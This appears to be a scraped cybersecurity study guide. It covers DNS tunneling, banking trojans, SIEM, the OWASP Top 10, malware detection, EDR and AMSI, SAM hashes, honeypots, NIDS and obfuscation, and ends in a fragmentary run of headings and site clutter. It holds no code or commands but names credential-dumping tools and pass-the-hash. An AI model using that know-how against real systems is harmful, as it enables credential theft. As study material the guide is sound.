- Behavioral Analysis: Using tools like EDR (Endpoint Detection and Response) and SIEM
(Security Information and Event Management) to monitor for suspicious behavior that may
indicate a zero-day attack.
6. DNS Tunneling
DNS Tunneling is a method used by attackers to bypass security measures and exfiltrate data from a
network by encoding it within DNS queries and responses. This technique exploits the DNS protocol,
which is typically allowed through firewalls and proxies.
How DNS Tunneling Works:
1. Compromised Host: The attacker infects a device within the target network.
2. DNS Queries: Data is encapsulated within DNS queries sent from the infected host to an
external attacker-controlled DNS server.
3. Data Transfer: The attacker’s DNS server decodes the data from the queries and sends
responses that also contain encoded data. This data can be decoded by the malware on the
compromised host.
Detection:
- Unusual DNS Traffic: High volumes of DNS queries or queries to domains with suspicious
patterns.
- Traffic Analysis: Use tools like DNS logging and analysis to monitor for abnormal behavior in
DNS traffic.
7. Ramnit Banking Trojan
Ramnit is a banking Trojan designed to steal sensitive information, including online banking credentials,
FTP passwords, and session cookies. It originally spread through phishing emails and infected
websites and can propagate through removable drives.
Key Features of Ramnit:
- Credential Theft: Ramnit is capable of capturing login credentials for online banking and other
financial services.
- Session Hijacking: It can hijack browser sessions to bypass two-factor authentication and take
over the victim's active online banking sessions.
- Persistence: Ramnit often employs techniques to maintain persistence on infected systems,
making it difficult to remove.
8. Case Study
A case study in cybersecurity typically involves a detailed examination of a real-world cyber incident or
campaign to understand the attacker’s tactics, techniques, and procedures (TTPs). Case studies help
organizations learn from past events and improve their own security measures.
Components of a Case Study:
- Incident Overview: A description of the attack, including how the breach occurred, what systems
were affected, and what data was compromised.
- Attack Timeline: A timeline of events from the initial compromise to the detection and mitigation
of the attack.
- Response Actions: Steps taken to contain and remediate the attack, such as patching
vulnerabilities, cleaning infected systems, and improving defenses.
Example:
- Target Breach (2013): Attackers exploited third-party vendor access to gain entry into Target’s
network, eventually stealing 40 million credit card numbers.
9. Working of SIEM Tool
A SIEM (Security Information and Event Management) tool collects, analyzes, and correlates security
logs from across an organization's infrastructure to detect and respond to potential security threats in
real-time.
How SIEM Works:
1. Log Collection: SIEM tools gather logs from various sources, including firewalls, servers,
applications, IDS/IPS, and endpoints.
2. Normalization: The SIEM tool normalizes log data from different formats into a consistent format
that can be analyzed.
3. Correlation: SIEM tools apply correlation rules to identify patterns or sequences of events that
could indicate a security incident.
4. Alerting: When a suspicious pattern is detected, the SIEM generates alerts and notifies security
teams of potential threats.
5. Incident Investigation: Security teams can investigate incidents within the SIEM by reviewing
logs, tracking alerts, and correlating additional information.
6. Reporting and Compliance: SIEM tools provide detailed reports that help organizations meet
regulatory requirements (e.g., PCI DSS, HIPAA).
Benefits of SIEM:
- Real-Time Monitoring: Provides immediate visibility into security incidents as they happen.
- Threat Detection: Detects threats through log correlation and advanced analytics.
- Compliance: Helps maintain compliance by logging, auditing, and reporting security events.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Common Web Server Attack
OWASP Top 10
Malware Detection Method
- Signature Based
- Hash Signature
- Byte Signature
- Heuristic Based
- Static Technique
- Anomaly & Behavior Based
- Dynamic Technique
Steps to prevent after attack/ suspicious system
EDR
MDR
AMSI
1. Common Web Server Attacks
Web servers are frequent targets for attackers due to the sensitive data they process and the critical
services they provide. Some common attacks on web servers include:
Common Web Server Attacks:
1. SQL Injection: Attackers exploit vulnerabilities in a website’s SQL database by injecting

malicious SQL code. This can lead to unauthorized data access, modification, or deletion.
2. Cross-Site Scripting (XSS): Malicious scripts are injected into web pages that users view. These
scripts can steal session cookies or redirect users to malicious sites.
3. Cross-Site Request Forgery (CSRF): Attackers trick users into performing actions on a web
application without their consent by exploiting their authenticated session.
4. Denial of Service (DoS/DDoS): Attackers flood a web server with traffic, causing it to slow down
or crash, making the website unavailable to legitimate users.
5. Directory Traversal: Exploiting vulnerabilities in web server configurations, attackers gain
unauthorized access to directories and files outside the web root directory.
6. Remote Code Execution (RCE): Attackers exploit server vulnerabilities to execute arbitrary code
on the server, potentially gaining control over the entire system.
7. File Inclusion Vulnerabilities: Attackers exploit vulnerabilities to include and execute
unauthorized files on the server, such as through Local File Inclusion (LFI) or Remote File
Inclusion (RFI).
2. OWASP Top 10
The OWASP Top 10 is a list of the most critical security risks for web applications, maintained by the
Open Web Application Security Project (OWASP). It helps developers, security professionals, and
organizations identify and mitigate common web security vulnerabilities.
OWASP Top 10 (2021):
1. Broken Access Control: Improperly enforced access controls allow attackers to bypass
authentication or authorization and access sensitive information or functions.
2. Cryptographic Failures: Insecure encryption practices that could expose sensitive data such as
passwords or credit card information.
3. Injection: Includes SQL, NoSQL, OS, and LDAP injection vulnerabilities where untrusted data is
sent to an interpreter, leading to code execution or data compromise.
4. Insecure Design: Lack of security design patterns and architectural practices that create
exploitable security flaws in software.
5. Security Misconfiguration: Misconfigurations in software, frameworks, or cloud infrastructure that
expose systems to vulnerabilities.
6. Vulnerable and Outdated Components: Using components with known vulnerabilities, such as
out-of-date libraries or frameworks.
7. Identification and Authentication Failures: Poor implementation of user authentication or session
management that allows attackers to impersonate users.
8. Software and Data Integrity Failures: The use of software that relies on untrusted sources,
which can lead to the introduction of malicious code.
9. Security Logging and Monitoring Failures: Lack of adequate logging or monitoring that can delay
the detection of security incidents.
10. Server-Side Request Forgery (SSRF): Attackers trick the server into sending requests to
unintended locations, often targeting internal systems.
3. Malware Detection Methods
Malware detection can be categorized into several methods based on how malware is identified:
1. Signature-Based Detection:
a. Signature-Based Detection relies on identifying known malware by comparing files or
behaviors against a database of predefined signatures.
b. Hash Signature: A unique hash (e.g., MD5, SHA-256) of a file is created. If a file
matches a known malware hash, it is flagged as malicious.
c. Byte Signature: Sequences of bytes that are specific to a piece of malware are identified
and used to detect its presence. These are patterns found in the binary code of malware.
2. Heuristic-Based Detection:
a. Heuristic-Based Detection uses rules and algorithms to identify suspicious behaviors or
characteristics that are indicative of malware, even if the malware is previously unknown.
b. Static Technique: Analyzes the code or file without executing it. It looks at the structure
of the file, such as examining PE headers, strings, imports, and other attributes, to
predict whether it is malicious.
c. Dynamic Technique: Involves running the file in a controlled environment (sandbox) to
observe its behavior. It watches for actions like modifying files, changing registry keys, or
initiating network connections to identify if it’s malicious.
3. Anomaly-Based and Behavior-Based Detection:
a. Anomaly-Based Detection: Identifies deviations from normal behavior. For example, if a
system suddenly starts sending out large amounts of data or running unknown
processes, this might be flagged as suspicious.
b. Behavior-Based Detection: Monitors the behavior of programs and files in real-time. This
method focuses on the actions that malware takes (e.g., attempts to modify system files,
escalate privileges) rather than its code structure.
4. Steps to Prevent After Attack/Suspicious System
Once an attack is detected, or a system is suspected of being compromised, immediate action is

necessary to minimize the damage and recover.
Steps to Prevent Further Damage After an Attack:
1. Isolate the Infected System: Disconnect the compromised system from the network to prevent
further spread of malware or lateral movement by the attacker.
2. Preserve Evidence: Avoid making changes to the system before collecting relevant logs,
memory dumps, and forensic evidence for analysis.
3. Conduct Root Cause Analysis: Identify the source of the attack, how the attacker gained entry,
and which vulnerabilities were exploited.
4. Remove Malware: Use antivirus/anti-malware tools, manual cleaning, or system restoration to
remove the malware from the affected systems.
5. Patch Vulnerabilities: Apply security patches or updates to fix the vulnerabilities that were
exploited during the attack.
6. Reset Credentials: Change all passwords, especially for privileged accounts, as they may have
been compromised.
7. Review Network Traffic: Look for any abnormal communication patterns and block malicious
IPs, domains, or ports used by the attackers.
8. Monitor for Persistence: Malware can use persistence techniques to remain active after system
reboots. Monitor for rogue services, registry keys, scheduled tasks, or startup programs.
9. Post-Incident Review: Conduct a thorough review of the attack to understand how it happened,
what was compromised, and what can be improved to prevent future incidents.
5. Endpoint Detection and Response (EDR)
EDR (Endpoint Detection and Response) is a security solution focused on continuous monitoring and
response to threats on endpoints (desktops, laptops, mobile devices, etc.). EDR tools detect suspicious
activity, provide real-time insights, and enable rapid responses to security incidents.
Key Features of EDR:

- Real-Time Monitoring: Continuously monitors endpoint activity to detect suspicious behavior and
potential threats.
- Threat Detection: Identifies both known and unknown threats using signature-based,
behavior-based, and heuristic analysis.
- Forensic Analysis: Provides detailed logs and data for analyzing incidents and conducting root
cause analysis.
- Automated Response: EDR tools can automatically contain and remediate threats (e.g.,
isolating infected machines or terminating malicious processes).
6. Managed Detection and Response (MDR)
MDR (Managed Detection and Response) is a service that provides advanced threat detection and
response capabilities by outsourcing security operations to a third-party provider. Unlike EDR, which is
a tool, MDR is a service where experts manage and monitor the security environment for an
organization.
Key Features of MDR:
- 24/7 Monitoring: MDR providers monitor your environment for security threats around the clock.
- Expertise: The service leverages the expertise of dedicated security analysts who investigate
alerts and incidents.
- Incident Response: MDR teams provide guidance or directly respond to incidents by containing
and mitigating threats.
- Threat Intelligence: MDR services typically include up-to-date threat intelligence, ensuring
detection of the latest and most sophisticated attacks.
7. Antimalware Scan Interface (AMSI)
AMSI (Antimalware Scan Interface) is a Microsoft API that provides a standard interface for applications
and services to integrate with antimalware solutions on Windows. It allows deep scanning of scripts,
macros, and other code by antivirus engines in real-time.
How AMSI Works:
1. Integration with Scripts: When scripts like PowerShell, JavaScript, or macros are executed,
AMSI passes the content to the antimalware software for scanning before execution.
2. Behavior-Based Detection: AMSI focuses on the behavior of the code (e.g., a PowerShell script
attempting to download a file) and can detect malicious actions dynamically.
3. Visibility into Obfuscated Code: AMSI helps detect malicious scripts even if they are obfuscated,
as it scans the de-obfuscated code during execution.
Benefits:
- Real-Time Protection: AMSI scans scripts at runtime, providing an additional layer of protection
against fileless malware and malicious scripts.
- Extended Coverage: It supports a wide range of script types, from PowerShell and VBScript to
JavaScript and macros embedded in Office documents.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Windows API
- user mode
- kernel mode
Dropper Downloader
Entropy
SAM - Windows Password stored database
TPM
IPS
- Honeypot
1. Windows API
The Windows API (Application Programming Interface) is a set of system calls that Windows
applications use to interact with the underlying operating system. It provides services such as file
access, process management, memory management, and communication between different programs.
Windows has two primary execution modes: user mode and kernel mode.
User Mode:
- Definition: User mode is a restricted mode where applications and user-level services run. In
user mode, processes are isolated from each other and from the core of the operating system to
prevent unintended interference or system crashes.
- Functionality:
- Applications in user mode cannot directly access hardware or critical system resources.
- If a user-mode application crashes, it generally doesn’t affect the entire operating
system.
- Communication with the operating system kernel happens via system calls, where the
application requests services from the kernel (such as file I/O or memory allocation).
- Examples: Web browsers, office applications, user-level processes like Task Manager,
and all user-installed software operate in user mode.
Kernel Mode:
- Definition: Kernel mode is a privileged mode that gives software unrestricted access to system
resources, including hardware components like memory, CPU, and devices. The operating
system kernel and core device drivers run in this mode.
- Functionality:
- Processes in kernel mode can execute any CPU instruction and reference any memory
address.
- Crashes in kernel mode can bring down the entire system (e.g., a "blue screen of
death").
- All requests from user mode are eventually handled in kernel mode.
- Examples: The Windows kernel, device drivers, and low-level system utilities operate in
kernel mode.
2. Dropper and Downloader
Dropper and Downloader are types of malware components used to deliver other malicious payloads.
Dropper:
- Definition: A dropper is a type of malware designed to "drop" (or install) other malicious
payloads onto the target system. The dropper itself may not perform malicious actions, but it
serves as a delivery mechanism for more harmful components, such as ransomware, trojans, or
keyloggers.
- Characteristics:
- Often disguised as legitimate software.
- Once executed, it extracts and installs additional malware from itself or downloads it
from a remote server.
- Droppers usually have obfuscation techniques to avoid detection by antivirus software.
Downloader:
- Definition: A downloader is a specialized form of dropper whose primary task is to fetch malware
from an external source (typically a remote server) after it has infected the system.
- Characteristics:
- Small in size and designed to establish a connection with the attacker's server to
download and execute further malware payloads.
- Used in the early stages of multi-stage attacks, where the initial infection is minimal to
avoid detection, and the heavier malicious payload is downloaded later.
3. Entropy
In the context of malware analysis, entropy is a measure of randomness or disorder within a file.
Entropy is used to determine whether a file is likely packed, encrypted, or obfuscated, which are
common techniques malware authors use to avoid detection.
High Entropy:
- Definition: A file with high entropy is more random and usually indicates that the file is
compressed or encrypted.
- Use in Malware Analysis: Many malware programs compress or encrypt their payloads to make
it harder for antivirus software to detect them. Entropy analysis helps analysts identify such
characteristics.
Low Entropy:
- Definition: A file with low entropy has more predictable and repetitive data, indicating that the file
is likely uncompressed or in plaintext.
- Example:
- High Entropy (Packed/Encrypted File): 7.9 out of 8.0 (close to randomness).
- Low Entropy (Plaintext/Executable File): 3.0 out of 8.0 (more structured data).
4. SAM (Security Account Manager) - Windows Password Stored Database
The SAM (Security Account Manager) database is a file in Windows that stores hashed passwords for
local user accounts. It’s a critical component of the Windows operating system for managing user
authentication.
Location:
- The SAM file is located in the `C:\Windows\System32\config` folder and is inaccessible while
Windows is running because it’s locked by the system.
Functionality:
- Password Hashing: SAM stores passwords in hashed format using the NTLM (NT LAN
Manager) or LM (LAN Manager) hashing algorithms.
- Protected Storage: Windows encrypts the SAM file to prevent direct access, but attackers can
still extract it during boot or by using a tool like `pwdump` or `Mimikatz`.
- Pass-the-Hash Attack: If an attacker can retrieve the hashed passwords from the SAM file, they
can attempt a "pass-the-hash" attack, where they use the hash to authenticate without needing
to crack the actual password.
5. TPM (Trusted Platform Module)
TPM (Trusted Platform Module) is a specialized hardware chip designed to provide secure
cryptographic functions. TPM is used to enhance the security of computing devices by securely storing
sensitive data, such as encryption keys, credentials, or certificates.
Functions of TPM:
- Cryptographic Key Storage: TPM securely stores cryptographic keys, preventing unauthorized
access.
- Hardware-Based Authentication: The chip can be used for authentication purposes, such as
validating the identity of a system or user.
- Disk Encryption (e.g., BitLocker): In Windows, TPM works with BitLocker to provide
hardware-based encryption for drives, ensuring that decryption keys are protected from
tampering.
- Platform Integrity: TPM can measure and ensure the integrity of a system by verifying that
firmware and system components have not been altered.
Use in Security:
- Secure Boot: Ensures that the operating system has not been tampered with during the boot
process.
- Device Identification: Provides a unique ID for devices, improving security in environments
where device trust is important.
6. IPS (Intrusion Prevention System)
An IPS (Intrusion Prevention System) is a network security tool designed to detect and prevent threats
in real-time. It is similar to an IDS (Intrusion Detection System), but with the added ability to actively
block or mitigate threats.
How IPS Works:
- Traffic Monitoring: The IPS monitors network traffic for suspicious activity or known attack
patterns.
- Signature-Based Detection: Detects known threats based on signatures in its database, similar
to antivirus detection.
- Anomaly-Based Detection: Identifies unusual patterns in traffic that may indicate an attack, such
as unusual bandwidth usage or access attempts.
- Prevention/Blocking: When a threat is detected, IPS can block malicious traffic, reset
connections, or reconfigure network settings to prevent further exploitation.
7. Honeypot
A honeypot is a decoy system or network designed to lure attackers away from legitimate targets. It
mimics a vulnerable system, tricking attackers into interacting with it so that security professionals can
analyze their tactics and gather intelligence.
Types of Honeypots:
- Low-Interaction Honeypots: Simulates basic services and systems but doesn’t provide a full
operating environment for the attacker.
- High-Interaction Honeypots: Mimics a full-fledged system, providing attackers with an
environment that looks and feels like a real network or application, allowing deep analysis of
their behavior.
Purpose:
- Threat Intelligence: Helps organizations understand new attack techniques, malware types, and
hacking strategies.
- Diversion: Diverts attackers from valuable assets to the honeypot, which is a controlled
environment.
- Vulnerability Discovery: Security professionals use honeypots to discover vulnerabilities that
attackers exploit.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
NIDS working
port mirroring
Open source tool & proprietory
WAZUH & YARA Rules integration
Encapsulation
Obfuscation
1. NIDS (Network Intrusion Detection System) Working

A Network Intrusion Detection System (NIDS) is a security system that monitors network traffic in
real-time to detect signs of malicious activity or policy violations. Unlike host-based systems, NIDS
focuses on network-level threats, examining traffic for suspicious patterns that may indicate an attack.
How NIDS Works:

1. Traffic Monitoring: NIDS passively monitors all incoming and outgoing network traffic by
analyzing packets in real-time.
2. Signature-Based Detection: NIDS compares network traffic against a database of known attack
signatures. If a packet matches a known signature (e.g., specific patterns for SQL injection or
DDoS attacks), it generates an alert.
3. Anomaly-Based Detection: This method involves detecting unusual traffic patterns that deviate
from the normal baseline of network activity. For example, if there’s a sudden spike in traffic or
unusual port activity, the NIDS will flag it as suspicious.
4. Heuristic Detection: NIDS may use heuristic methods to detect potential zero-day attacks or new
variants of known malware by analyzing packet behaviors that don’t fit predefined patterns but
are nonetheless suspicious.
5. Logging and Alerting: When NIDS identifies suspicious traffic, it generates an alert and logs the
details (source/destination IP, time, traffic type) for further investigation.
6. Placement in Network: NIDS is typically deployed in a network’s "choke points," such as
between internal and external networks (e.g., at the gateway or firewall), so it can monitor traffic
entering and leaving the network.
Advantages:
- Detects network-wide threats and attacks.
- Can monitor large-scale traffic patterns.
Limitations:
- Cannot detect attacks that occur within encrypted traffic.
- It is a passive system and does not actively block traffic (unlike IPS).
2. Port Mirroring
Port mirroring, also known as SPAN (Switched Port Analyzer), is a technique used on network switches
to send copies of network packets from one port (or VLAN) to another port where it can be analyzed by
a network tool like a NIDS, Wireshark, or any packet analyzer.
How It Works:
- Configuration: Network administrators configure a switch to mirror traffic from one or multiple
ports to a designated mirror port. This mirror port is connected to the NIDS or another
monitoring tool.
- Traffic Analysis: Once the mirrored traffic reaches the monitoring port, the NIDS inspects the
traffic for any malicious activity or suspicious behavior without interfering with the live traffic.
- Use Case: Port mirroring is essential for passive network monitoring in NIDS, as it allows
security teams to analyze traffic without altering its flow.
Advantages:
- Non-intrusive traffic monitoring.
- No impact on the performance of live network traffic.
Disadvantages:
- Requires careful configuration to avoid overloading the mirror port with too much traffic.
3. Open Source Tools & Proprietary Tools
Open Source Tools:

Open-source security tools are software applications whose source code is freely available for
anyone to use, modify, and distribute. They are community-driven and provide flexibility and
transparency.
Advantages:
- No licensing fees; cost-effective.
- Strong community support and regular updates.
- Flexibility to customize according to specific needs.
- Examples:
- Snort: An open-source NIDS/IPS tool used for real-time traffic analysis.
- Wazuh: An open-source security monitoring and incident response tool.
- Wireshark: A widely used open-source packet analyzer for network
troubleshooting and analysis.
Proprietary Tools:
Proprietary security tools are developed and maintained by commercial organizations and
require a license to use. They often provide additional support, features, and integrations
compared to open-source alternatives.
Advantages:
- Professional support and maintenance.
- Often more user-friendly with polished interfaces.
- Enterprise-level features and integrations.
- Examples:
- Splunk: A proprietary SIEM (Security Information and Event Management) tool
for real-time monitoring and threat analysis.
- McAfee Network Security Platform: A commercial NIDS/IPS solution.
- Palo Alto Networks: Offers firewall, IPS, and network security solutions.
4. WAZUH & YARA Rules Integration
Wazuh is an open-source platform that provides security monitoring, threat detection, and incident
response. YARA is a tool designed to help malware researchers identify and classify malware samples
by creating rules to detect malicious patterns. Integrating Wazuh with YARA enables more effective
malware detection and response.
Wazuh and YARA Integration:

1. Wazuh collects system and application logs, file integrity data, and other security events across
endpoints.
2. YARA Rules: Wazuh can integrate YARA rules to scan files or processes for known malware
signatures, behavior patterns, or indicators of compromise (IOCs).
3. Real-Time Detection: When Wazuh detects suspicious files or activity, it can trigger YARA scans
to identify if the file or activity matches any predefined rules, alerting the security team of
potential threats.
4. Automated Response: Based on the results of YARA scans, Wazuh can generate alerts or
initiate automated actions, such as quarantining a file or escalating a threat to incident
response.
Use Cases:
- Malware Detection: Use YARA rules to detect known malware by scanning files on endpoints.
- Threat Hunting: YARA can help hunt for previously undetected threats by identifying patterns of
malicious activity.
5. Encapsulation
Encapsulation is a network concept in which data is wrapped within headers and footers to be sent
across a network. It occurs at various layers of the OSI model, where each layer adds its own control
information (headers) to ensure the data reaches its destination properly.
How Encapsulation Works:

- Process:
1. At the application layer, data is created.
2. The transport layer encapsulates the data by adding headers, including port numbers.
3. The network layer adds IP addresses for routing.
4. The data link layer adds MAC addresses.
5. The physical layer transmits the encapsulated data as bits over the network.
- Decapsulation: At the receiving end, each layer removes its respective header/footer in reverse
order, ensuring the data is interpreted correctly by the receiving application.
Use Case in VPN:

- Encapsulation is essential in VPNs (Virtual Private Networks) where a protocol like IPsec
encapsulates data for secure transmission across public networks.
6. Obfuscation
Obfuscation is the process of deliberately making something difficult to understand, often applied to
source code or data in order to hide its true purpose, making it harder for humans or automated
systems to analyze.
Types of Obfuscation:
1. Code Obfuscation:
- Transforming the source code of a program into a format that is difficult to reverse
engineer while retaining its functionality.
- Used by malware authors to prevent detection by security systems and analysts.
2. Data Obfuscation:
- Masking sensitive data such as encryption keys or login credentials within files or
memory to hide them from attackers.
3. String Obfuscation:
- Converting plain text strings (like URLs, commands) into unreadable formats to evade
detection tools or security analysts.
Use in Malware:
- Obfuscation is frequently used by malware to evade antivirus systems by altering the
appearance of its code without changing its behavior. For example, packing the malware or
inserting junk code are common obfuscation techniques.
- Example:
- Encoded PowerShell Command: A common technique used by attackers is to obfuscate
a PowerShell command by encoding it in Base64 to evade detection by static analysis
tools.

Study Material

Uploaded by

Copyright:

Available Formats

Study Material

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Study Material

Uploaded by

Copyright:

Available Formats

CIA Triad

■ Confidentiality → Ensures information is accessible only to authorized personnel (e.g., encryption)

2. IP and Their Classes

- IPv6: A 128-bit address that provides a much larger address space.

Range: 1.0.0.0 to 126.0.0.0

Default Subnet Mask: 255.0.0.0

Range: 128.0.0.0 to 191.255.0.0

Default Subnet Mask: 255.255.0.0

Suitable for medium-sized networks (universities, large businesses).

Default Subnet Mask: 255.255.255.0

Range: 224.0.0.0 to 239.255.255.255

Used for multicast.

Range: 240.0.0.0 to 255.255.255.255

Reserved for research and future use.

3. Gateway Scenario Example

- The computer sends the data to its default gateway (router).

4. Common Port Numbers

6. Blue Team vs. Red Team

1. OSI Model (Open Systems Interconnection Model)

OSI Layers (from Layer 7 to Layer 1):

2. Cyber Kill Chain (CKC)

Stages of the Cyber Kill Chain:

1. Reconnaissance: Attackers gather intelligence on targets, identifying weaknesses and potential

3. MITRE ATTaCK Framework

DNS Query Process:

1. User requests a domain (like `www.example.com`).

5. FQDN and PQDN

6. DHCP (Dynamic Host Configuration Protocol)

How DHCP Works:

- External Firewall: Protects the DMZ from external attacks.

1. HTTP Request & Response

3. Virus & Threat Protection

4. IOC (Indicators of Compromise) & IOA (Indicators of Attack)

These terms are used in cybersecurity to identify signs of potential threats:

IOC (Indicators of Compromise)

5. SIEM (Security Information and Event Management)

Popular SIEM tools include Splunk, IBM QRadar, and ArcSight.

6. EDR (Endpoint Detection and Response) Working

How EDR Works:

8. IDS (Intrusion Detection System) & IPS (Intrusion Prevention System)

IDS (Intrusion Detection System)

- NIDS (Network-based IDS): Monitors network traffic for threats.

IPS (Intrusion Prevention System)

1. AMSI (Antimalware Scan Interface)

How AMSI Works:

2. Data Link Layer (OSI Model)

Functions of the Data Link Layer:

Sublayers of Data Link Layer:

3. AAA (Authentication, Authorization, and Accounting)

4. TLP (Traffic Light Protocol)

TLP Color Codes:

5. TTP (Tactics, Techniques, and Procedures)

1. Finding Fingerprinting as Malicious (with Basic Example)

Basic Example of Fingerprinting:

How to Detect Malicious Fingerprinting:

2. Hiding Malware into Software

Techniques for Hiding Malware:

How Fileless Malware Works:

4. Automatic Malware Analysis

Key Components of Automatic Malware Analysis: